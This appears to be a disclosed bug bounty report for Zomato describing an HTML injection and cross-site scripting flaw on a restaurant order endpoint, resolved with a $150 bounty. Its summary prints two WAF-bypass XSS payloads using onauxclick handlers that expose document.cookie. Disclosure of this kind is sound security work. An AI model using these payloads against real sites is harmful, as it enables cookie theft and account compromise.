HTML Injection @ /[restaurant]/order endpoint.
Low
Z
Zomato
Submitted None
Team Summary
Official summary from Zomato
The following payloads were used to bypass the WAF and perform XSS: Basic payload but did not work on all browsers: ```html "><details onauxclick=x=prompt,x`${document.cookie}`></details> ``` Payload worked on all browsers, but needed a right-click to be executed: ```html "><marquee+width=1000+onauxclick=confirm(document.cookie)>XSS</marquee> ```
Actions:
Reported by
mr_edwards
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$150.00
Submitted
Weakness
Cross-site Scripting (XSS) - Generic